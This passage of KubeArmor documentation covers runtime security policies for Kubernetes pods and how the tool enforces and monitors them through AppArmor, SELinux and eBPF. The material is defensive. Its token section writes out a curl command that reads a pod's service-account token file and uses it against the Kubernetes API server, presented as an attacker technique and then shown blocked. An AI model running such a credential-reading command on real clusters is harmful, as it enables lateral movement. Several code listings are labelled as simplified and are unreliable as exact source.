  "HostPID": 3341928,
  "PPID": 786,
  "PID": 792,
  "ParentProcessName": "/bin/dash",
  "ProcessName": "/usr/bin/apt",
  "PolicyName": "block-pkg-mgmt-tools-exec",
  "Severity": "1",
  "Type": "MatchedPolicy",
  "Source": "/bin/dash",
  "Operation": "Process",
  "Resource": "/usr/bin/apt update",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Permission denied"
}
Deny access to service account token

K8s mounts the service account token by default in each pod even if no app is using it. Attackers use these service account tokens to perform lateral movement.

For example, to access the service account token:

❯ kubectl exec -it $POD -- bash
(inside pod) $ curl https://$KUBERNETES_PORT_443_TCP_ADDR/api --insecure --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)"
{
  "kind": "APIVersions",
  "versions": [
    "v1"
  ],
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "ip-10-0-48-51.us-east-2.compute.internal:443"
    }
  ]
}

Thus we can see that one can use the service account token to access the Kube API server.

Let's apply a policy to block access to the service account token:

cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-service-access-token-access
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /run/secrets/kubernetes.io/serviceaccount/
      recursive: true
  action:
    Block
EOF

Now when anyone tries to access the service account token, it will be Permission Denied:

❯ kubectl exec -it $POD -- bash
(inside pod) $ curl https://$KUBERNETES_PORT_443_TCP_ADDR/api --insecure --header "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)"
cat: /run/secrets/kubernetes.io/serviceaccount/token: Permission denied
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/api\"",
  "reason": "Forbidden",
  "details": {},
  "code": 403
}

If you don't see Permission denied, please refer to here to debug this issue.

Audit access to folders/paths

Access to certain folders/paths might have to be audited for compliance/reporting reasons.

File visibility is disabled by default to minimize telemetry. Some file-based policies need it enabled. To enable file visibility on a namespace level:

kubectl annotate ns default kubearmor-visibility="process,file,network" --overwrite

For more details on this: https://docs.kubearmor.io/kubearmor/documentation/kubearmor_visibility#updating-namespace-visibility

Let's audit access to the /etc/nginx/ folder within the deployment:

cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: audit-etc-nginx-access
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /etc/nginx/
      recursive: true
  action:
    Audit
EOF

Note: karmor logs -n default would show all the audit/block operations.

{
  "Timestamp": 1686478371,
  "UpdatedTime": "2023-06-11T10:12:51.967519Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "HostPPID": 3224933,
  "HostPID": 3371357,
  "PPID": 3224933,
  "PID": 825,
  "ParentProcessName": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/bin/cat",
  "PolicyName": "audit-etc-nginx-access",
  "Severity": "1",
  "Type": "MatchedPolicy",
  "Source": "/bin/cat /etc/nginx/conf.d/default.conf",
  "Operation": "File",
  "Resource": "/etc/nginx/conf.d/default.conf",
  "Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY",
  "Enforcer": "eBPF Monitor",
  "Action": "Audit",
  "Result": "Passed"
}

Zero Trust Least Permissive Policy: Allow only nginx to execute in the pod, deny rest

Least-permissive policies require one to allow certain actions/operations and deny the rest. With KubeArmor it is possible to specify as part of the policy which actions should be allowed, and to deny/audit the rest.

By default the security posture is set to audit. The security posture defines what happens to operations that are not in the allowed list: should they be audited (allowed but alerted), or denied (blocked and alerted)? Let's change the security posture to default deny:

kubectl annotate ns default kubearmor-file-posture=block --overwrite

Now apply the least-permissive policy:

cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: only-allow-nginx-exec
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /
      recursive: true
  process:
    matchPaths:
    - path: /usr/sbin/nginx
    - path: /bin/bash
  action:
    Allow
EOF

Observe that the policy contains the Allow action. Once any KubeArmor policy with an Allow action applies to a pod, the pod enters least-permissive mode, allowing only explicitly allowed operations.

Note: Use kubectl port-forward $POD --address 0.0.0.0 8080:80 to access nginx and you can see that the nginx web access still works normally.

Let's try to execute some other processes:

kubectl exec -it $POD -- bash -c "chroot"

Any binary other than bash and nginx will be denied execution. If you don't see Permission denied, please refer to here to debug this issue.



Runtime Enforcer

Welcome back! In the previous chapter, we learned how KubeArmor figures out who is performing an action on your system by understanding Container/Node Identity. We saw how it maps low-level system details like Namespace IDs to higher-level concepts like Pods, containers, and nodes, using information from the Kubernetes API and the container runtime.

Now that KubeArmor knows who is doing something, it needs to decide if that action is allowed. This is the job of the Runtime Enforcer.

What is the Runtime Enforcer?

Think of the Runtime Enforcer as the actual security guard positioned at the gates and doors of your system. It receives the security rules you defined in your Security Policies (KSP, HSP, CSP). But applications and the operating system don't directly understand KubeArmor policy YAML!

The Runtime Enforcer's main task is to translate these high-level KubeArmor rules into instructions that the underlying operating system's built-in security features can understand and enforce. These OS security features are powerful mechanisms within the Linux kernel designed to control what processes can and cannot do. Common examples include:

  • AppArmor: Used by distributions like Ubuntu, Debian, and SLES. It uses security profiles that define access controls for individual programs (processes).

  • SELinux: Used by distributions like Fedora, CentOS/RHEL, and Alpine Linux. It uses a system of labels and rules to control interactions between processes and system resources.

  • BPF-LSM: A newer mechanism using eBPF programs attached to Linux Security Module (LSM) hooks to enforce security policies directly within the kernel.

When an application or process on your node or inside a container attempts to do something (like open a file, start a new process, or make a network connection), the Runtime Enforcer (via the configured OS security feature) steps in. It checks the translated rules that apply to the identified workload and tells the operating system whether to Allow, Audit, or Block the action.

Why Do We Need a Runtime Enforcer? A Use Case Revisited

Let's go back to our example: preventing a web server container (with label app: my-web-app) from reading /etc/passwd.

In Chapter 1, we wrote a KubeArmor Policy for this:

# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-etc-passwd-read
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-web-app # Policy applies to containers/pods with this label
  file:
    matchPaths:
      - path: /etc/passwd # Specific file to protect
        # No readOnly specified means all access types are subject to 'action'
  action: Block # What to do if the rule is violated

In Chapter 2, we saw how KubeArmor's Container/Node Identity component identifies that a specific process trying to read /etc/passwd belongs to a container running a Pod with the label app: my-web-app.

Now, the Runtime Enforcer takes over:

  1. It knows the action is "read file /etc/passwd".

  2. It knows the actor is the container identified as having the label app: my-web-app.

  3. It looks up the applicable policies for this actor and action.

  4. It finds the block-etc-passwd-read policy, which says action: Block for /etc/passwd.

  5. The Runtime Enforcer, using the underlying OS security module, tells the Linux kernel to Block the read attempt.

The application trying to read the file will receive a "Permission denied" error, and the attempt will be stopped before it can succeed.
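From inside the container this looks like an ordinary permission failure. An illustrative session (the pod name is hypothetical):

kubectl exec -it my-web-app-pod -- cat /etc/passwd
cat: /etc/passwd: Permission denied
command terminated with exit code 1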

How KubeArmor Selects and Uses an Enforcer

KubeArmor is designed to be flexible and work on different Linux systems. It doesn't assume a specific OS security module is available. When KubeArmor starts on a node, it checks which security modules are enabled and supported on that particular system.

You can configure KubeArmor to prefer one enforcer over another using the lsm.lsmOrder configuration option. KubeArmor will try to initialize the enforcers in the specified order (bpf, selinux, apparmor) and use the first one that is available and successfully initialized. If none of the preferred ones are available, it falls back to any other supported, available LSM. If no supported enforcer can be initialized, KubeArmor will run in a limited capacity (primarily for monitoring, not enforcement).

You can see KubeArmor selecting the LSM in the NewRuntimeEnforcer function (from KubeArmor/enforcer/runtimeEnforcer.go):

// KubeArmor/enforcer/runtimeEnforcer.go (Simplified)

func NewRuntimeEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
	// ... code to check available LSMs on the system ...

	// This selectLsm function tries to find and initialize the best available enforcer
	return selectLsm(re, cfg.GlobalCfg.LsmOrder, availablelsms, lsms, node, pinpath, logger, monitor)
}

// selectLsm Function (Simplified logic)
func selectLsm(re *RuntimeEnforcer, lsmOrder, availablelsms, supportedlsm []string, node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
	// Try LSMs in preferred order first
	// If preferred fails or is not available, try others

	if kl.ContainsElement(supportedlsm, "bpf") && kl.ContainsElement(availablelsms, "bpf") {
		// Attempt to initialize BPFEnforcer
		re.bpfEnforcer, err = be.NewBPFEnforcer(...)
		if re.bpfEnforcer != nil {
			re.EnforcerType = "BPFLSM"
			// Success, return BPF enforcer
			return re
		}
		// BPF failed, try next...
	}

	if kl.ContainsElement(supportedlsm, "apparmor") && kl.ContainsElement(availablelsms, "apparmor") {
		// Attempt to initialize AppArmorEnforcer
		re.appArmorEnforcer = NewAppArmorEnforcer(...)
		if re.appArmorEnforcer != nil {
			re.EnforcerType = "AppArmor"
			// Success, return AppArmor enforcer
			return re
		}
		// AppArmor failed, try next...
	}

	if !kl.IsInK8sCluster() && kl.ContainsElement(supportedlsm, "selinux") && kl.ContainsElement(availablelsms, "selinux") {
		// Attempt to initialize SELinuxEnforcer (only for host policies outside K8s)
		re.seLinuxEnforcer = NewSELinuxEnforcer(...)
		if re.seLinuxEnforcer != nil {
			re.EnforcerType = "SELinux"
			// Success, return SELinux enforcer
			return re
		}
		// SELinux failed, try next...
	}

	// No supported/available enforcer found
	return nil
}

This snippet shows that KubeArmor checks for available LSMs (lsms) and attempts to initialize its corresponding enforcer module (be.NewBPFEnforcer, NewAppArmorEnforcer, NewSELinuxEnforcer) based on configuration and availability. The first one that succeeds becomes the active EnforcerType.

Once an enforcer is selected and initialized, the KubeArmor Daemon on the node loads the relevant policies for the workloads it is protecting and translates them into the specific rules required by the chosen enforcer.

The Enforcement Process: Under the Hood

When KubeArmor needs to enforce a policy on a specific container or node, here's a simplified flow:

  1. Policy Change/Discovery: A KubeArmor Policy (KSP, HSP, or CSP) is applied or changed via the Kubernetes API. The KubeArmor Daemon on the relevant node detects this.

  2. Identify Affected Workloads: The daemon determines which specific containers or the host node are targeted by this policy change using the selectors and its internal Container/Node Identity mapping.

  3. Translate Rules: For each affected workload, the daemon takes the high-level policy rules (e.g., Block access to /etc/passwd) and translates them into the low-level format required by the active Runtime Enforcer (AppArmor, SELinux, or BPF-LSM).

  4. Load Rules into OS: The daemon interacts with the operating system to load or update these translated rules. This might involve writing files, calling system utilities (apparmor_parser, chcon), or interacting with BPF system calls and maps.

  5. OS Enforcer Takes Over: The OS kernel's security module (now configured by KubeArmor) is now active.

  6. Action Attempt: A process within the protected workload attempts a specific action (e.g., opening /etc/passwd).

  7. Interception: The OS kernel intercepts this action using hooks provided by its security module.

  8. Decision: The security module checks the rules previously loaded by KubeArmor that apply to the process and resource involved. Based on the action (Allow, Audit, Block) defined in the KubeArmor policy (and translated into the module's format), the security module makes a decision.

  9. Enforcement:

    • If Block, the OS prevents the action and returns an error to the process.

    • If Allow, the OS permits the action.

    • If Audit, the OS permits the action but generates a log event.

  10. Event Notification (for Audit/Block): (As we'll see in the next chapter), the OS kernel generates an event notification for blocked or audited actions, which KubeArmor then collects for logging and alerting.

After policies are loaded, the actual enforcement decision happens deep within the OS kernel, powered by the rules that KubeArmor translated and loaded. KubeArmor isn't in the critical path for every action attempt; it pre-configures the kernel's security features to handle the enforcement directly.

Looking at the Code: Translating and Loading

Let's see how KubeArmor interacts with the different OS enforcers.

AppArmor Enforcer:

AppArmor uses text-based profile files stored typically in /etc/apparmor.d/. KubeArmor translates its policies into rules written in AppArmor's profile language, saves them to a file, and then uses the apparmor_parser command-line tool to load or update these profiles in the kernel.

// KubeArmor/enforcer/appArmorEnforcer.go (Simplified)

// UpdateAppArmorProfile Function
func (ae *AppArmorEnforcer) UpdateAppArmorProfile(endPoint tp.EndPoint, appArmorProfile string, securityPolicies []tp.SecurityPolicy) {
	// ... code to generate the AppArmor profile string based on KubeArmor policies ...
	// This involves iterating through securityPolicies and converting them to AppArmor rules

	newProfileContent := "## == Managed by KubeArmor == ##\n...\n" // generated content

	// Write the generated profile to a file
	newfile, err := os.Create(filepath.Clean("/etc/apparmor.d/" + appArmorProfile))
	// ... error handling ...
	_, err = newfile.WriteString(newProfileContent)
	// ... error handling and file closing ...

	// Load/reload the profile into the kernel using apparmor_parser
	if err := kl.RunCommandAndWaitWithErr("apparmor_parser", []string{"-r", "-W", "/etc/apparmor.d/" + appArmorProfile}); err != nil {
		// Log error if loading fails
		ae.Logger.Warnf("Unable to update ... (%s)", err.Error())
		return
	}

	ae.Logger.Printf("Updated security rule(s) to %s/%s", endPoint.EndPointName, appArmorProfile)
}

This snippet shows the key steps: generating the profile content, writing it to a file path based on the container/profile name, and then executing the apparmor_parser command with the -r (reload) and -W (wait) flags to apply the profile to the kernel.
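To make the translation concrete, the generated content is ordinary AppArmor profile language. A hand-written sketch of what a "Block /etc/passwd" rule could look like inside such a profile (the profile name is hypothetical, and real generated profiles are considerably larger):

## == Managed by KubeArmor == ##
profile kubearmor-default-my-web-app flags=(attach_disconnected,mediate_deleted) {
  file,                  # baseline file access
  network,               # baseline network access
  deny /etc/passwd rw,   # translated from the Block rule; deny rules take precedence
}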

SELinux Enforcer:

SELinux policy management is complex, often involving compiling policy modules and managing file contexts. KubeArmor's SELinux enforcer focuses primarily on basic host policy enforcement (in standalone mode, not typically in Kubernetes clusters using the default SELinux integration). It interacts with tools like chcon to set file security contexts based on policies.

// KubeArmor/enforcer/SELinuxEnforcer.go (Simplified)

// UpdateSELinuxLabels Function
func (se *SELinuxEnforcer) UpdateSELinuxLabels(profilePath string) bool {
	// ... code to read translated policy rules from a file ...
	// The file contains rules like "SubjectLabel SubjectPath ObjectLabel ObjectPath ..."

	res := true
	// Iterate through rules from the profile file
	for _, line := range strings.Split(string(profile), "\n") {
		words := strings.Fields(line)
		if len(words) != 7 { continue }

		subjectLabel := words[0]
		subjectPath := words[1]
		objectLabel := words[2]
		objectPath := words[3]

		// Example: Change the label of a file/directory using chcon
		if subjectLabel == "-" { // Rule doesn't specify subject path label
			if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
				// Log error if chcon fails
				se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
				res = false
			}
		} else { // Rule specifies both subject and object path labels
			if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", subjectLabel, subjectPath}); err != nil {
				se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", subjectLabel, subjectPath, err.Error())
				res = false
			}
			if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
				se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
				res = false
			}
		}
		// ... handles directory and recursive options ...
	}
	return res
}

This snippet shows KubeArmor executing the chcon command to modify the SELinux security context (label) of files, which is a key way SELinux enforces access control.
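For reference, chcon is a standard SELinux utility, so the effect of the calls above can be reproduced by hand. A minimal sketch (the type label karmor_file_t is hypothetical):

# set the SELinux type of a path so that loaded policy rules govern access to it
chcon -t karmor_file_t /path/to/protected/file
# verify the resulting label
ls -Z /path/to/protected/file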

BPF-LSM Enforcer:

The BPF-LSM enforcer works differently. Instead of writing text files and using external tools, it loads eBPF programs directly into the kernel and populates eBPF maps with rule data. When an event occurs, the eBPF program attached to the relevant LSM hook checks the rules stored in the map to make the enforcement decision.

// KubeArmor/enforcer/bpflsm/enforcer.go (Simplified)

// NewBPFEnforcer instantiates an object for setting up BPF LSM enforcement
func NewBPFEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) (*BPFEnforcer, error) {
	// ... code to remove memory lock limits for BPF programs ...

	// Load the BPF programs and maps compiled from the C code
	if err := loadEnforcerObjects(&be.obj, &ebpf.CollectionOptions{
		Maps: ebpf.MapOptions{PinPath: pinpath},
	}); err != nil {
		// Handle loading errors
		be.Logger.Errf("error loading BPF LSM objects: %v", err)
		return be, err
	}

	// Attach BPF programs to LSM hooks
	// Example: Attach the 'EnforceProc' program to the 'security_bprm_check' LSM hook
	be.Probes[be.obj.EnforceProc.String()], err = link.AttachLSM(link.LSMOptions{Program: be.obj.EnforceProc})
	if err != nil {
		// Handle attachment errors
		be.Logger.Errf("opening lsm %s: %s", be.obj.EnforceProc.String(), err)
		return be, err
	}

    // ... similarly attach other BPF programs for file, network, capabilities, etc. ...

	// Get references to BPF maps (like the map storing rules per container)
	be.BPFContainerMap = be.obj.KubearmorContainers // Renamed from be.obj.Maps.KubearmorContainers

	// ... setup ring buffer for events (discussed in next chapter) ...

	return be, nil
}

// AddContainerIDToMap Function (Example of populating a map with rules)
func (be *BPFEnforcer) AddContainerIDToMap(containerID string, pidns, mntns uint32) {
	// ... code to get/generate rules for this container ...
	// rulesData := generateBPFRules(containerID, policies)

	// Look up or create the inner map for this container's rules
	containerMapKey := NsKey{PidNS: pidns, MntNS: mntns} // Uses namespace IDs as the key for the outer map

	// Update the BPF map with the container's rules or identity
	// This would typically involve creating/getting a reference to an inner map
	// and then populating that inner map with specific path -> rule mappings.
	// For simplification, let's assume a direct mapping for identity:
	containerMapValue := uint32(1) // Simplified: A value indicating the container is active

	if err := be.BPFContainerMap.Update(containerMapKey, containerMapValue, cle.UpdateAny); err != nil {
		be.Logger.Warnf("Error updating BPF map for container %s: %v", containerID, err)
	}
	// ... More complex logic would add rules to an inner map associated with this containerMapKey
}

This heavily simplified snippet shows how the BPF enforcer loads BPF programs and attaches them to kernel LSM hooks. It also hints at how container identity (Container/Node Identity) is used (via pidns, mntns) as a key to organize rules within BPF maps (BPFContainerMap), allowing the kernel's BPF program to quickly look up the relevant policy when an event occurs. The AddContainerIDToMap function, although simplified, demonstrates how KubeArmor populates these maps.

Each enforcer type requires specific logic within KubeArmor to translate policies and interact with the OS. The Runtime Enforcer component provides this abstraction layer, allowing KubeArmor policies to be enforced regardless of the underlying Linux security module, as long as it's supported.
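
Conceptually, you can picture that abstraction layer as a small interface that every backend implements. Below is a minimal sketch with hypothetical names (Enforcer, UpdateRules), not KubeArmor's actual types:

package main

import "fmt"

// Enforcer abstracts over the AppArmor, SELinux, and BPF-LSM backends
// (hypothetical interface, for illustration only).
type Enforcer interface {
	Name() string
	UpdateRules(workloadID string, rules []string) error
}

// bpfLSM is one possible backend behind the interface.
type bpfLSM struct{}

func (bpfLSM) Name() string { return "BPFLSM" }

func (bpfLSM) UpdateRules(workloadID string, rules []string) error {
	// A real backend would translate the rules and update BPF maps here.
	fmt.Printf("loading %d rule(s) for %s into BPF maps\n", len(rules), workloadID)
	return nil
}

func main() {
	// The daemon would pick the backend based on what the node supports.
	var e Enforcer = bpfLSM{}
	_ = e.UpdateRules("db-container-1234", []string{"block /bin/bash"})
}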

Policy Actions and the Enforcer

The action specified in your KubeArmor policy (Security Policies) directly maps to how the Runtime Enforcer instructs the OS:

  • Allow: The translated rule explicitly permits the action. The OS security module will let the action proceed.

  • Audit: The translated rule allows the action but is configured to generate a log event. The OS security module lets the action proceed and notifies the kernel's logging system.

  • Block: The translated rule denies the action. The OS security module intercepts the action and prevents it from completing, typically returning an error to the application.

This allows you to use KubeArmor policies not just for strict enforcement but also for visibility and testing (Audit).
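
As a rough sketch of this mapping, the decision logic inside an enforcer boils down to a switch on the action, following the kernel convention where returning 0 allows an operation and a negative errno (like -EPERM) denies it. This is hypothetical Go code for illustration, not KubeArmor's implementation:

package main

import "fmt"

// eperm mimics the kernel convention of returning a negative errno
// (EPERM is 1, so a denial is -1).
const eperm = -1

// decide mirrors the Allow/Audit/Block semantics described above.
func decide(action string, report func(msg string)) int {
	switch action {
	case "Allow":
		return 0 // permit silently
	case "Audit":
		report("action permitted but logged") // permit, and emit an event
		return 0
	case "Block":
		report("action denied") // emit an event, then deny
		return eperm
	default:
		return 0 // unknown action: fall back to allow
	}
}

func main() {
	alert := func(msg string) { fmt.Println("alert:", msg) }
	fmt.Println(decide("Audit", alert)) // 0
	fmt.Println(decide("Block", alert)) // -1
}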

Conclusion

The Runtime Enforcer is the critical piece that translates your human-readable KubeArmor policies into the low-level language understood by the operating system's security features (AppArmor, SELinux, BPF-LSM). It's responsible for loading these translated rules into the kernel, enabling the OS to intercept and enforce your desired security posture for containers and host processes based on their identity.

By selecting the appropriate enforcer for your system and dynamically updating its rules, KubeArmor ensures that your security policies are actively enforced at runtime. In the next chapter, we'll look at the other side of runtime security: observing system events, including those that were audited or blocked by the Runtime Enforcer.

BPF (eBPF)

Welcome back to the KubeArmor tutorial! In the previous chapter, we explored the System Monitor, KubeArmor's eyes and ears inside the operating system, responsible for observing runtime events like file accesses, process executions, and network connections. We learned that the System Monitor uses a powerful kernel technology called eBPF to achieve this deep visibility with low overhead.

In this chapter, we'll take a closer look at BPF (Extended Berkeley Packet Filter), or eBPF as it's more commonly known today. This technology isn't just used by the System Monitor; it's also a key enforcer type available to the Runtime Enforcer component in the form of BPF-LSM. Understanding eBPF is crucial to appreciating how KubeArmor works at a fundamental level within the Linux kernel.

What is BPF (eBPF)?

Imagine the Linux kernel as the central operating system managing everything on your computer or server. Traditionally, if you wanted to add new monitoring, security, or networking features deep inside the kernel, you had to write C code, compile it as a kernel module, and load it. This is risky because bugs in kernel modules can crash the entire system.

eBPF provides a safer, more flexible way to extend kernel functionality. Think of it as a miniature, highly efficient virtual machine running inside the kernel. It allows you to write small programs that can be loaded into the kernel and attached to specific "hooks" (points where interesting events happen).

Here's the magic:

  • Safe: eBPF programs are verified by a kernel component called the "verifier" before they are loaded. The verifier ensures the program won't crash the kernel, hang, or access unauthorized memory.

  • Performant: eBPF programs run directly in the kernel's execution context when an event hits their hook. They are compiled into native machine code for the processor using a "Just-In-Time" (JIT) compiler, making them very fast.

  • Flexible: They can be attached to various hooks for monitoring or enforcement, including system calls, network events, tracepoints, and even Linux Security Module (LSM) hooks.

  • Data Sharing: eBPF programs can interact with user-space programs (like the KubeArmor Daemon) and other eBPF programs using shared data structures called BPF Maps.

Why KubeArmor Uses BPF (eBPF)

KubeArmor needs to operate deep within the operating system to provide effective runtime security for containers and nodes. It needs to:

  1. See Everything: Monitor low-level system calls and kernel events across different container namespaces (Container/Node Identity).

  2. Act Decisively: Enforce security policies by blocking forbidden actions before they can harm the system.

  3. Do it Efficiently: Minimize the performance impact on your applications.

eBPF is the perfect technology for this:

  • Deep Visibility: By attaching eBPF programs to kernel hooks, KubeArmor's System Monitor gets high-fidelity data about system activities as they happen.

  • High-Performance Enforcement: When used as a Runtime Enforcer via BPF-LSM, eBPF programs can quickly check policies against events directly within the kernel, blocking actions instantly without the need to switch back and forth between kernel and user space for every decision.

  • Low Overhead: eBPF's efficiency means it adds minimal latency to system calls compared to older kernel security mechanisms or relying purely on user-space monitoring.

  • Kernel Safety: KubeArmor can extend kernel behavior for security without the risks associated with traditional kernel modules.

BPF in Action: Monitoring and Enforcement

Let's look at how BPF powers both sides of KubeArmor's runtime protection:

1. BPF for Monitoring (The System Monitor)

As we saw in Chapter 4, the System Monitor observes events. This is primarily done using eBPF.

  • How it works: Small eBPF programs are attached to kernel hooks related to file, process, network, etc., events. When an event triggers a hook, the eBPF program runs. It collects relevant data (like the path, process ID, Namespace IDs) and writes this data into a special shared memory area called a BPF Ring Buffer.

  • Getting Data to KubeArmor: The KubeArmor Daemon (KubeArmor Daemon) in user space continuously reads events from this BPF Ring Buffer.

  • Context: The daemon uses the Namespace IDs from the event data to correlate it with the specific container or node (Container/Node Identity) before processing and sending the alert via the Log Feeder.

The monitoring data flow is simple and efficient: the kernel triggers a BPF program, which quickly logs event data to a buffer that KubeArmor reads asynchronously.

Let's revisit a simplified code concept for the BPF monitoring program side (C code compiled to BPF):

// Simplified BPF C code for monitoring (part of system_monitor.c)

struct event {
  u64 ts;
  u32 pid_id; // PID Namespace ID
  u32 mnt_id; // Mount Namespace ID
  u32 event_id; // Type of event
  char comm[16]; // Process name
  char path[256]; // File path or network info
};

// Define a BPF map of type RINGBUF for sending events to user space
struct {
  __uint(type, BPF_MAP_TYPE_RINGBUF);
  __uint(max_entries, 1 << 24);
} kubearmor_events SEC(".maps"); // This name is referenced in Go code

SEC("kprobe/sys_enter_openat") // Attach to the openat syscall entry
int kprobe__sys_enter_openat(struct pt_regs *ctx) {
  struct event *task_info;

  // Reserve space in the ring buffer
  task_info = bpf_ringbuf_reserve(&kubearmor_events, sizeof(*task_info), 0);
  if (!task_info)
    return 0; // Could not reserve space, drop event

  // Populate the event data
  task_info->ts = bpf_ktime_get_ns();
  struct task_struct *task = (struct task_struct *)bpf_get_current_task();
  task_info->pid_id = get_task_pid_ns_id(task); // Helper to get NS ID
  task_info->mnt_id = get_task_mnt_ns_id(task); // Helper to get NS ID
  task_info->event_id = 1; // Example: 1 for file open
  bpf_get_current_comm(&task_info->comm, sizeof(task_info->comm));

  // Get path argument (simplified greatly)
  // Note: Real BPF code needs careful handling of user space pointers
  const char *pathname = (const char *)PT_REGS_PARM2(ctx);
  bpf_probe_read_str(task_info->path, sizeof(task_info->path), pathname);

  // Submit the event to the ring buffer
  bpf_ringbuf_submit(task_info, 0);
  return 0;
}

Explanation:

  • struct event: Defines the structure of the data sent for each event.

  • kubearmor_events: Defines a BPF map of type RINGBUF. This is the channel for kernel -> user space communication.

  • SEC("kprobe/sys_enter_openat"): Specifies where this program attaches - at the entry of the openat system call.

  • bpf_ringbuf_reserve: Allocates space in the ring buffer for a new event.

  • bpf_ktime_get_ns, bpf_get_current_task, bpf_get_current_comm, bpf_probe_read_str: BPF helper functions used to get data from the kernel context (timestamp, task info, command name, string from user space).

  • bpf_ringbuf_submit: Sends the prepared event data to the ring buffer.

On the Go side, KubeArmor's System Monitor uses the cilium/ebpf library to load this BPF object file and read from the kubearmor_events map (the ring buffer).

// Simplified Go code for reading BPF events (part of systemMonitor.go)

// systemMonitor Structure (relevant parts)
type SystemMonitor struct {
    // ... other fields ...
    SyscallPerfMap *perf.Reader // Represents the connection to the ring buffer
    // ... other fields ...
}

// Function to load BPF objects and start reading
func (mon *SystemMonitor) StartBPFMonitoring() error {
    // Load the compiled BPF code (.o file)
    objs := &monitorObjects{} // monitorObjects corresponds to maps and programs in the BPF .o file
    if err := loadMonitorObjects(objs, nil); err != nil {
        return fmt.Errorf("failed to load BPF objects: %w", err)
    }
    // mon.bpfObjects = objs // Store loaded objects (simplified)

    // Open the BPF ring buffer map for reading
    // "kubearmor_events" matches the map name in the BPF C code
    rd, err := perf.NewReader(objs.KubearmorEvents, os.Getpagesize())
    if err != nil {
        objs.Close() // Clean up loaded objects
        return fmt.Errorf("failed to create BPF ring buffer reader: %w", err)
    }
    mon.SyscallPerfMap = rd // Store the reader

    // Start a goroutine to read events from the buffer
    go mon.readEvents()

    // ... Attach BPF programs to hooks (simplified out) ...

    return nil
}

// Goroutine function to read events
func (mon *SystemMonitor) readEvents() {
    for {
        record, err := mon.SyscallPerfMap.Read() // Read a raw event from the kernel
        if err != nil {
            // ... error handling, check if reader was closed ...
            return
        }

        // Process the raw event data (parse bytes, add context)
        // As shown in Chapter 4 context:
        // dataBuff := bytes.NewBuffer(record.RawSample)
        // ctx, err := readContextFromBuff(dataBuff) // Parses struct event
        // ... lookup containerID using ctx.PidID, ctx.MntID ...
        // ... format and send event for logging ...
    }
}

Explanation:

  • loadMonitorObjects: Loads the compiled BPF program and map definitions from the .o file.

  • perf.NewReader(objs.KubearmorEvents, ...): Opens a reader for the specific BPF map named kubearmor_events defined in the BPF code. This map is configured as a ring buffer.

  • mon.SyscallPerfMap.Read(): Blocks until an event is available in the ring buffer, then reads the raw bytes sent by the BPF program.

  • The rest of the readEvents function (simplified out, but hinted at in Chapter 4 context) involves parsing these bytes back into a struct, looking up the container/node identity, and processing the event.

This demonstrates how BPF allows a low-overhead kernel component (the BPF program writing to the ring buffer) and a user-space component (KubeArmor Daemon reading from the buffer) to communicate efficiently.
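
To make the "parse bytes" step concrete, here's a minimal, self-contained sketch that decodes a raw sample into a Go struct mirroring the simplified C event structure above. It assumes a packed, little-endian layout; real code must match the kernel struct's exact field order and alignment:

package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

// rawEvent mirrors the simplified C struct event shown earlier,
// assuming a packed little-endian layout.
type rawEvent struct {
	Ts      uint64
	PidID   uint32
	MntID   uint32
	EventID uint32
	Comm    [16]byte
	Path    [256]byte
}

// parseEvent decodes one raw sample read from the BPF buffer.
func parseEvent(sample []byte) (*rawEvent, error) {
	var ev rawEvent
	if err := binary.Read(bytes.NewReader(sample), binary.LittleEndian, &ev); err != nil {
		return nil, err
	}
	return &ev, nil
}

func main() {
	// A zero-filled sample of the right size decodes cleanly.
	sample := make([]byte, binary.Size(rawEvent{}))
	ev, err := parseEvent(sample)
	if err != nil {
		panic(err)
	}
	fmt.Printf("event id=%d pidns=%d mntns=%d\n", ev.EventID, ev.PidID, ev.MntID)
}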

2. BPF for Enforcement (BPF-LSM Enforcer)

When KubeArmor is configured to use the BPF-LSM Runtime Enforcer, BPF programs are used not just for monitoring, but for making enforcement decisions in the kernel.

